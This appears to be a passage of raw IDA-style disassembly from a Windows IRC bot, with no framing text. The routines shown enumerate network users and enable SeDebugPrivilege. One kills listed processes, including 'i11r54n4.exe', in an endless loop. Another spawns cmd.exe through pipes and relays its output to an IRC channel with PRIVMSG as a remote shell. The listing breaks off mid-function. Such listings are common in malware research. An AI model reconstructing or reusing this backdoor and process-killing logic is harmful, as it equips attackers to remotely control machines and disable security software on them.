push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 24h
jmp short loc_419947
; ---------------------------------------------------------------------------
loc_4198CC: ; CODE XREF: sub_41982C+62�j
; sub_41982C+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_41995A
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_419947
loc_4198DE: ; CODE XREF: sub_41982C+ED�j
cmp edi, esi
jz short loc_41991D
push dword ptr [edi]
lea eax, [ebp+Dest]
push offset aS_4 ; " %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_4198DE
jmp short loc_419947
; ---------------------------------------------------------------------------
loc_41991D: ; CODE XREF: sub_41982C+B4�j
lea eax, [ebp+Dest]
push offset asc_439EA4 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 1Ch
loc_419947: ; CODE XREF: sub_41982C+9E�j
; sub_41982C+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41995A
push edi
call dword_4CBA64
xor edi, edi
mov [ebp+var_4], edi
loc_41995A: ; CODE XREF: sub_41982C+A5�j
; sub_41982C+120�j
cmp [ebp+var_C], 0EAh
jz loc_41986B
cmp edi, esi
jz short loc_419972
push edi
call dword_4CBA64
loc_419972: ; CODE XREF: sub_41982C+13D�j
push [ebp+var_8]
lea eax, [ebp+Dest]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_41982C endp
; =============== S U B R O U T I N E =======================================
sub_4199AC proc near ; CODE XREF: sub_418FE5+41�p
; sub_4191DB+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_419A5E
jz loc_419A57
cmp eax, 7Bh
ja short loc_419A23
jz short loc_419A19
cmp eax, 5
jz short loc_419A0F
cmp eax, 8
jz short loc_419A05
cmp eax, 32h
jz short loc_4199FB
cmp eax, 35h
jz short loc_4199F1
cmp eax, 57h
jnz loc_419AAD
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_4199F1: ; CODE XREF: sub_4199AC+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_4199FB: ; CODE XREF: sub_4199AC+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A05: ; CODE XREF: sub_4199AC+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A0F: ; CODE XREF: sub_4199AC+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A19: ; CODE XREF: sub_4199AC+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A23: ; CODE XREF: sub_4199AC+1A�j
sub eax, 7Ch
jz short loc_419A50
sub eax, 7C8h
jz short loc_419A49
dec eax
jz short loc_419A3F
dec eax
jnz short loc_419AAD
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A3F: ; CODE XREF: sub_4199AC+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A49: ; CODE XREF: sub_4199AC+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A50: ; CODE XREF: sub_4199AC+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A57: ; CODE XREF: sub_4199AC+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A5E: ; CODE XREF: sub_4199AC+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_419A97
jz short loc_419A90
sub eax, 8ADh
jz short loc_419AC2
dec eax
dec eax
jz short loc_419A89
dec eax
jz short loc_419A82
dec eax
dec eax
jnz short loc_419AAD
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A82: ; CODE XREF: sub_4199AC+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A89: ; CODE XREF: sub_4199AC+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A90: ; CODE XREF: sub_4199AC+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A97: ; CODE XREF: sub_4199AC+B9�j
sub eax, 8CAh
jz short loc_419AC9
sub eax, 17h
jz short loc_419AC2
sub eax, 25h
jz short loc_419ABB
sub eax, 29h
jz short loc_419AB4
loc_419AAD: ; CODE XREF: sub_4199AC+35�j
; sub_4199AC+87�j ...
push offset aAnUnknownErr_0 ; "An unknown error occurred."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419AB4: ; CODE XREF: sub_4199AC+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419ABB: ; CODE XREF: sub_4199AC+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419AC2: ; CODE XREF: sub_4199AC+C2�j
; sub_4199AC+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419AC9: ; CODE XREF: sub_4199AC+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_419ACE: ; CODE XREF: sub_4199AC+40�j
; sub_4199AC+4A�j ...
push offset byte_4DB5E0 ; Dest
call _sprintf
pop ecx
mov eax, offset byte_4DB5E0
pop ecx
retn
sub_4199AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419AE0(char *Source)
sub_419AE0 proc near ; CODE XREF: sub_401ACD+467F�p
Dest = word ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
Source = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h ; MaxCount
push [ebp+Source] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _mbstowcs
add esp, 0Ch
lea eax, [ebp+Source]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+Source], esi
call ds:dword_4270C8 ; GetComputerNameA
lea eax, [ebp+var_108]
push esi ; MaxCount
push eax ; Source
lea eax, [ebp+var_318]
push eax ; Dest
call _mbstowcs
lea eax, [ebp+Dest]
push eax ; Str
call _wcslen
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call dword_4CB9E4
test eax, eax
jnz short loc_419B70
mov esi, offset byte_4DB3DC
push offset asc_43A20C ; "-"
push esi ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_419B99
; ---------------------------------------------------------------------------
loc_419B70: ; CODE XREF: sub_419AE0+7A�j
lea ecx, [ebp+Dest]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_4199AC
pop ecx
mov esi, offset byte_4DB3DC
push eax
push offset asc_43A1E0 ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
loc_419B99: ; CODE XREF: sub_419AE0+8E�j
mov eax, esi
pop esi
leave
retn
sub_419AE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B9E proc near ; CODE XREF: sub_4172C1+45�p
; sub_4172C1+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_427104 ; GetCurrentProcess
push eax
call dword_4CB9B8 ; OpenProcessToken
test eax, eax
jnz short loc_419BBD
leave
retn
; ---------------------------------------------------------------------------
loc_419BBD: ; CODE XREF: sub_419B9E+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_4CB990 ; LookupPrivilegeValueA
test eax, eax
jz short loc_419BFB
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_419BE4
or [ebp+var_8], 2
jmp short loc_419BE8
; ---------------------------------------------------------------------------
loc_419BE4: ; CODE XREF: sub_419B9E+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_419BE8: ; CODE XREF: sub_419B9E+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call dword_4CBA40 ; AdjustTokenPrivileges
mov esi, eax
loc_419BFB: ; CODE XREF: sub_419B9E+32�j
push [ebp+var_4]
call ds:dword_427070 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_419B9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419C09(int,char *Str,int,char *Str2,int,int)
sub_419C09 proc near ; CODE XREF: sub_401ACD+7770�p
; sub_419E38+74�p ...
Dest = byte ptr -554h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
Str1 = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
Str2 = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp dword_4CB9F4, ebx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_419E08
cmp dword_4CB9D8, ebx
jz loc_419E08
cmp dword_4CB8E8, ebx
jz loc_419E08
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419B9E
pop ecx
pop ecx
push ebx
push 0Fh
call dword_4CB9F4 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_419DFB
lea eax, [ebp+var_130]
mov [ebp+var_130], 128h
push eax
push edi
call dword_4CB9D8 ; Process32First
mov esi, ds:dword_427070
test eax, eax
jz loc_419DF6
lea eax, [ebp+var_130]
push eax
push edi
call dword_4CB8E8 ; Process32Next
test eax, eax
jz loc_419DF6
mov edi, ds:dword_42708C
mov ebx, 1F0FFFh
loc_419CCD: ; CODE XREF: sub_419C09+1E5�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_419D34
mov [ebp+var_4], offset off_43A238
loc_419CDB: ; CODE XREF: sub_419C09+F3�j
mov eax, [ebp+var_4]
push dword ptr [eax]
lea eax, [ebp+Str1]
push eax
call ds:dword_42718C ; lstrcmpi
test eax, eax
jz short loc_419D03
add [ebp+var_4], 4
cmp [ebp+var_4], offset aI11r54n4_exe ; "i11r54n4.exe"
jb short loc_419CDB
jmp loc_419DDC
; ---------------------------------------------------------------------------
loc_419D03: ; CODE XREF: sub_419C09+E6�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz loc_419DDC
push 0
push eax
call ds:dword_4270FC ; TerminateProcess
test eax, eax
jnz loc_419DDC
loc_419D2A: ; CODE XREF: sub_419C09+1B9�j
push [ebp+var_4]
call esi ; CloseHandle
jmp loc_419DDC
; ---------------------------------------------------------------------------
loc_419D34: ; CODE XREF: sub_419C09+C9�j
cmp [ebp+Str2], eax
jnz loc_419DC7
cmp [ebp+Str], eax
jz loc_419DDC
push [ebp+var_128]
push 8
call dword_4CB9F4 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_419D87
lea ecx, [ebp+var_354]
push ecx
push eax
call dword_4CB894 ; Module32First
push [ebp+var_128]
test eax, eax
jz short loc_419D8D
lea eax, [ebp+var_234]
jmp short loc_419D93
; ---------------------------------------------------------------------------
loc_419D87: ; CODE XREF: sub_419C09+15C�j
push [ebp+var_128]
loc_419D8D: ; CODE XREF: sub_419C09+174�j
lea eax, [ebp+Str1]
loc_419D93: ; CODE XREF: sub_419C09+17C�j
push eax
lea eax, [ebp+Dest]
push offset aSD_0 ; " %s (%d)"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
push 1 ; int
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
jmp loc_419D2A
; ---------------------------------------------------------------------------
loc_419DC7: ; CODE XREF: sub_419C09+12E�j
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_419E0F
loc_419DDC: ; CODE XREF: sub_419C09+F5�j
; sub_419C09+10A�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call dword_4CB8E8 ; Process32Next
test eax, eax
jnz loc_419CCD
xor ebx, ebx
loc_419DF6: ; CODE XREF: sub_419C09+9D�j
; sub_419C09+B3�j
push [ebp+var_8]
call esi ; CloseHandle
loc_419DFB: ; CODE XREF: sub_419C09+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419B9E
pop ecx
pop ecx
loc_419E08: ; CODE XREF: sub_419C09+3A�j
; sub_419C09+46�j ...
xor eax, eax
loc_419E0A: ; CODE XREF: sub_419C09+22D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419E0F: ; CODE XREF: sub_419C09+1D1�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
push [ebp+var_8]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
call ds:dword_4270FC ; TerminateProcess
test eax, eax
jnz short loc_419E33
push edi
call esi ; CloseHandle
jmp short loc_419E08
; ---------------------------------------------------------------------------
loc_419E33: ; CODE XREF: sub_419C09+223�j
push 1
pop eax
jmp short loc_419E0A
sub_419C09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E38 proc near ; DATA XREF: sub_401ACD+2687�o
Dest = byte ptr -298h
var_98 = dword ptr -98h
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset asc_43A438 ; "-"
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_419E97
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_98] ; int
call sub_409869
add esp, 14h
loc_419E97: ; CODE XREF: sub_419E38+3D�j
push [ebp+var_10] ; int
lea eax, [ebp+Str]
push esi ; int
push esi ; Str2
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_98] ; int
call sub_419C09
add esp, 18h
test eax, eax
jnz short loc_419EBF
push offset unk_43A414
jmp short loc_419EC4
; ---------------------------------------------------------------------------
loc_419EBF: ; CODE XREF: sub_419E38+7E�j
push offset asc_43A3F0 ; "-"
loc_419EC4: ; CODE XREF: sub_419E38+85�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_419EF7
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_98] ; int
call sub_409869
add esp, 14h
loc_419EF7: ; CODE XREF: sub_419E38+9D�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_14]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_419E38 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419F16 proc near ; CODE XREF: sub_401ACD+7712�p
; sub_40B4F5+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call ds:dword_42708C ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_419F48
push 0
push esi
call ds:dword_4270FC ; TerminateProcess
test eax, eax
jnz short loc_419F48
push esi
xor edi, edi
call ds:dword_427070 ; CloseHandle
loc_419F48: ; CODE XREF: sub_419F16+1A�j
; sub_419F16+27�j
mov eax, edi
pop edi
pop esi
retn
sub_419F16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_419F4D proc near ; DATA XREF: WinMain(x,x,x,x)+3CD�o
push esi
xor esi, esi
loc_419F50: ; CODE XREF: sub_419F4D+1E�j
push 1 ; int
push esi ; int
push esi ; Str2
push esi ; int
push esi ; Str
push esi ; int
call sub_419C09
add esp, 18h
push dword_43A234
call ds:dword_427080 ; Sleep
jmp short loc_419F50
sub_419F4D endp
; =============== S U B R O U T I N E =======================================
sub_419F6D proc near ; CODE XREF: sub_419F9D+2A�p
; sub_419FD5+7E�p ...
mov eax, dword_4DBC48
push esi
mov esi, ds:dword_427070
cmp eax, 0FFFFFFFFh
jz short loc_419F81
push eax
call esi ; CloseHandle
loc_419F81: ; CODE XREF: sub_419F6D+F�j
mov eax, dword_4DBC50
cmp eax, 0FFFFFFFFh
jz short loc_419F8E
push eax
call esi ; CloseHandle
loc_419F8E: ; CODE XREF: sub_419F6D+1C�j
mov eax, dword_4DBC44
cmp eax, 0FFFFFFFFh
jz short loc_419F9B
push eax
call esi ; CloseHandle
loc_419F9B: ; CODE XREF: sub_419F6D+29�j
pop esi
retn
sub_419F6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419F9D(char *Str)
sub_419F9D proc near ; CODE XREF: sub_401ACD+7475�p
; sub_416000+14A�p
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+Str] ; Str
call _strlen
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+Str]
push dword_4DBC4C
call ds:dword_4270F0 ; WriteFile
test eax, eax
jnz short loc_419FD0
call sub_419F6D
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_419FD0: ; CODE XREF: sub_419F9D+28�j
push 1
pop eax
leave
retn
sub_419F9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419FD5(int,char *Str1,int)
sub_419FD5 proc near ; CODE XREF: sub_41A05C+D3�p
; sub_41A05C+F2�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str1 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_43DB88 ; Str2
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_41A018
push 7D0h
call ds:dword_427080 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+Dest]
push [ebp+Str1]
push offset aPrivmsgSS_1 ; "PRIVMSG %s :%s\r"
push eax ; Dest
call _sprintf
add esp, 10h
jmp short loc_41A02F
; ---------------------------------------------------------------------------
loc_41A018: ; CODE XREF: sub_419FD5+1A�j
push [ebp+arg_8]
lea eax, [ebp+Dest]
push offset aS_6 ; "%s"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_41A02F: ; CODE XREF: sub_419FD5+41�j
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
test eax, eax
jg short loc_41A058
call sub_419F6D
loc_41A058: ; CODE XREF: sub_419FD5+7C�j
xor eax, eax
leave
retn
sub_419FD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A05C proc near ; DATA XREF: sub_41A1B1+170�o
Dst = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset byte_4DBC54
loc_41A074: ; CODE XREF: sub_41A05C+79�j
; sub_41A05C+DB�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+Dst]
push esi
push eax
push dword_4DBC48
call ds:dword_427194 ; PeekNamedPipe
test eax, eax
jz loc_41A142
cmp [ebp+var_4], edi
jnz short loc_41A0D7
lea eax, [ebp+var_8]
push eax
push dword_4DBC44
call ds:dword_427190 ; GetExitCodeProcess
test eax, eax
jz short loc_41A0CD
cmp [ebp+var_8], 103h
jnz loc_41A166
loc_41A0CD: ; CODE XREF: sub_41A05C+62�j
push 0Ah
call ds:dword_427080 ; Sleep
jmp short loc_41A074
; ---------------------------------------------------------------------------
loc_41A0D7: ; CODE XREF: sub_41A05C+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_41A0EE
loc_41A0DE: ; CODE XREF: sub_41A05C+90�j
cmp [ebp+eax+Dst], 0Ah
jz short loc_41A13C
inc eax
cmp eax, [ebp+var_4]
jb short loc_41A0DE
loc_41A0EE: ; CODE XREF: sub_41A05C+80�j
mov [ebp+var_4], esi
loc_41A0F1: ; CODE XREF: sub_41A05C+E4�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+Dst]
push eax
push dword_4DBC48
call ds:dword_4270EC ; ReadFile
test eax, eax
jz short loc_41A18E
lea eax, [ebp+Dst]
push eax ; int
push ebx ; Str1
push dword_4DBC88 ; int
call sub_419FD5
add esp, 0Ch
jmp loc_41A074
; ---------------------------------------------------------------------------
loc_41A13C: ; CODE XREF: sub_41A05C+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_41A0F1
; ---------------------------------------------------------------------------
loc_41A142: ; CODE XREF: sub_41A05C+45�j
push offset unk_43A4C0 ; int
push ebx ; Str1
push dword_4DBC88 ; int
call sub_419FD5
push [ebp+arg_0]
call sub_40B6D6
add esp, 10h
push 1
call ds:dword_4270D4 ; ExitThread
loc_41A166: ; CODE XREF: sub_41A05C+6B�j
call sub_419F6D
push offset unk_43A498 ; int
push ebx ; Str1
push dword_4DBC88 ; int
call sub_419FD5
push [ebp+arg_0]
call sub_40B6D6
add esp, 10h
push edi
call ds:dword_4270D4 ; ExitThread
loc_41A18E: ; CODE XREF: sub_41A05C+C3�j
push offset unk_43A468 ; int
push ebx ; Str1
push dword_4DBC88 ; int
call sub_419FD5
push [ebp+arg_0]
call sub_40B6D6
add esp, 10h
push edi
call ds:dword_4270D4 ; ExitThread
sub_41A05C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A1B1 proc near ; CODE XREF: sub_401ACD+24AA�p
; sub_416000+99�p
Dest = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
Dst = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push ebx
push esi
push edi
call sub_419F6D
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_4CBA90 ; SearchPathA
test eax, eax
jz loc_41A2AB
push 1
lea eax, [ebp+var_1C]
pop ebx
mov edi, ds:dword_427108
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_41A2AB
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_41A2AB
mov edi, ds:dword_427104
push 3
push esi
push esi
push offset dword_4DBC4C
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_427100 ; DuplicateHandle
test eax, eax
jz short loc_41A2AB
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_74]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+Dst]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
mov ebx, offset byte_43DB88
push esi
lea eax, [ebp+var_178]
push ebx
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_427074 ; CreateProcessA
test eax, eax
jnz short loc_41A2B3
loc_41A2AB: ; CODE XREF: sub_41A1B1+2F�j
; sub_41A1B1+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_41A361
; ---------------------------------------------------------------------------
loc_41A2B3: ; CODE XREF: sub_41A1B1+F8�j
push [ebp+var_4]
mov edi, ds:dword_427070
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_4DBC48, eax
mov eax, [ebp+var_8]
mov dword_4DBC50, eax
mov eax, [ebp+Dst]
mov dword_4DBC44, eax
call edi ; CloseHandle
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov dword_4DBC88, eax
jz short loc_41A2ED
push [ebp+arg_4]
jmp short loc_41A2EE
; ---------------------------------------------------------------------------
loc_41A2ED: ; CODE XREF: sub_41A1B1+135�j
push ebx ; Format
loc_41A2EE: ; CODE XREF: sub_41A1B1+13A�j
push offset byte_4DBC54 ; Dest
call _sprintf
pop ecx
pop ecx
push esi ; int
push 0Ah ; int
push offset asc_43A524 ; "-"
call sub_40B3BA
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov dword_43E918[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_41A05C
push esi
push esi
call ds:dword_427084 ; CreateThread
cmp eax, esi
mov dword_43E924[edi], eax
jnz short loc_41A35F
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dest]
push offset asc_43A4F0 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 10h
loc_41A35F: ; CODE XREF: sub_41A1B1+185�j
xor eax, eax
loc_41A361: ; CODE XREF: sub_41A1B1+FD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A1B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A366 proc near ; DATA XREF: sub_401ACD+2DC8�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_41A3AD
call sub_41A3C6
jmp short loc_41A3B2
; ---------------------------------------------------------------------------
loc_41A3AD: ; CODE XREF: sub_41A366+3E�j
call sub_41A6EA
loc_41A3B2: ; CODE XREF: sub_41A366+45�j
add esp, 10h
push [ebp+var_14]
call sub_40B6D6
pop ecx
push 0
call ds:dword_4270D4 ; ExitThread
sub_41A366 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A3C6 proc near ; CODE XREF: sub_41A366+40�p
Dest = byte ptr -214h
